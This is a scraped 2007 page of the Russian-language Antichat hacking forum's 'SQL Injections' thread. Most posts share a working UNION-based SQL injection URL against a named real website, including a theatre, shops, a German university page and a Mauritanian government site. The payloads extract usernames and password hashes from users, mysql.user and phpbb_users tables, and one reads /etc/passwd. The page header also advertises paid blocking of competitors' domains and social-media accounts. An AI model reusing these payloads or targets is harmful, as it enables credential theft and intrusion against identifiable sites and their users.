Форум АНТИЧАТ - SQL Инъекции

ANTICHAT.XYZ

VIDEO.ANTICHAT.XYZ

НОВЫЕ СООБЩЕНИЯ

ФОРУМ

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 148 из 1239

148

Опции темы

Поиск в этой теме

Опции просмотра

31.03.2007, 20:20

maxster

Участник форума

Регистрация: 27.10.2006

Сообщений: 205

Провел на форуме:
2298631

Репутация: 380

Отправить сообщение для maxster с помощью ICQ

Код:

http://radio.localka.ru/jazz/songinfo.php?song_id=-264+union+select+1,2,pw,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,0x697427732061646d696e,24,25,26,27,user,29,30+from+users/*

c помощью лимита можно крутить

Код:

http://radio.localka.ru/jazz/songinfo.php?song_id=-264+union+select+1,2,mysql.user.password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,0x4d7953514c2070617373,24,25,26,27,user,29,30+from+mysql.user/*

пасс от базы(не разломал)

Код:

http://radio.localka.ru/jazz/songinfo.php?song_id=-264+union+select+1,2,LOAD_FILE(0x2f6574632f706173737764),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,0x2f6574632f706173737764,29,30/*

/etc/passwd

Последний раз редактировалось maxster; 31.03.2007 в 20:30..

31.03.2007, 20:23

valiko

Участник форума

Регистрация: 28.01.2007

Сообщений: 153

Провел на форуме:
1237085

Репутация: 452

Код:

http://www.franko-theatre.kiev.ua/show.php?id=75'+union+select+1,convert(concat(user(),0x3a,version(),0x3a,database())+using+cp1251)/*

31.03.2007, 20:27

Joker-jar

Постоянный

Регистрация: 11.03.2007

Сообщений: 581

Провел на форуме:
4172659

Репутация: 646

Отправить сообщение для Joker-jar с помощью ICQ

Код:

http://kamazmaster.iww.ru/shop/index.php?productID=1'

Купи КамАЗ

31.03.2007, 20:33

XTErner

Участник форума

Регистрация: 13.03.2007

Сообщений: 120

Провел на форуме:
1604641

Репутация: 590

Код:

http://shop.drengo.it/shopping/index.php?id=-854370+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(username,0x3a,password),0x71),0x71),3,4,5,6,7,8,9,10,11+from+users/*

все внизу

31.03.2007, 21:04

Constantine

Members of Antichat - Level 5

Регистрация: 24.11.2006

Сообщений: 927

Провел на форуме:
7192869

Репутация: 3033

Симпатишная

Код:

http://www.winfors.uni-koeln.de/people/main.html?ID=1+union+select+1,concat(user,char(58),password),3,4,5,6,7,8,concat_ws(char(58),user(),version(),database())+from+mysql.user/*

2Joker-jar раскрученные выкладываем скули!

__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ

31.03.2007, 21:07

kamaz

Познающий

Регистрация: 31.01.2007

Сообщений: 88

Провел на форуме:
631013

Репутация: 453

Отправить сообщение для kamaz с помощью ICQ

Цитата:

Сообщение от Joker-jar

Купи КамАЗ

Это я не мог ни поковырять

Цитата:

http://www.kamazmaster.iww.ru/shop/index.php?productID=-3%20union%20select%20%20concat_ws(char(58),user(), version(),database())/*

Вывод - Просмотр HTML кода => ctrl+f "hidden name=categoryID value="

Последний раз редактировалось kamaz; 31.03.2007 в 21:09..

31.03.2007, 21:09

Grey

AMA - Level 2

Регистрация: 10.06.2006

Сообщений: 1,113

Провел на форуме:
17668503

Репутация: 5826

Код:

http://www.admpokachi.ru/resourse.php?news_id=-1+union+select+concat(username,char(58),user_password),2,3,4+from+phpbb_users+limit+1,1/*

Код:

http://www.talka.ru/price/?id=-1+union+select+1,2,3,concat(username,char(58),user_password),5,6,7,8,9,10,11+from+phpbb_users+limit+1,1/*

31.03.2007, 21:43

XTErner

Участник форума

Регистрация: 13.03.2007

Сообщений: 120

Провел на форуме:
1604641

Репутация: 590

maed.gov.mr

Код:

http://www.maed.gov.mr/detailevent.php?id=-113%20UNION%20SELECT%201,2,3,concat(user,0x3a,password),5,6+from+mysql.user/*

пасс чегото не выводится=\

31.03.2007, 22:00

Grey

AMA - Level 2

Регистрация: 10.06.2006

Сообщений: 1,113

Провел на форуме:
17668503

Репутация: 5826

Может и было...

Код:

http://www.rozenbaum.ru/music/index.php?type=2&id=25&id2=-1+union+select+1,2,3,4,5,concat(database(),char(58),user(),char(58),version()),7,8,9/*
http://www.rozenbaum.ru/music/index.php?type=2&id=25&id2=-1+union+select+1,2,3,4,5,concat(username,char(58),user_password),7,8,9+from+forum.phpbb_users+limit+1,1/*

#10

31.03.2007, 22:03

ice1k

Постоянный

Регистрация: 01.01.2007

Сообщений: 551

Провел на форуме:
4908597

Репутация: 1866

Отправить сообщение для ice1k с помощью ICQ

Цитата:

Сообщение от Grey

Может и было...

Код:

http://www.rozenbaum.ru/music/index.php?type=2&id=25&id2=-1+union+select+1,2,3,4,5,concat(database(),char(58),user(),char(58),version()),7,8,9/*
http://www.rozenbaum.ru/music/index.php?type=2&id=25&id2=-1+union+select+1,2,3,4,5,concat(username,char(58),user_password),7,8,9+from+forum.phpbb_users+limit+1,1/*

Было..
Из этой скули можно "извлечь всё, что только можно"

Последний раз редактировалось ice1k; 31.03.2007 в 22:12..

Страница 148 из 1239

148

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

ANTICHAT.XYZ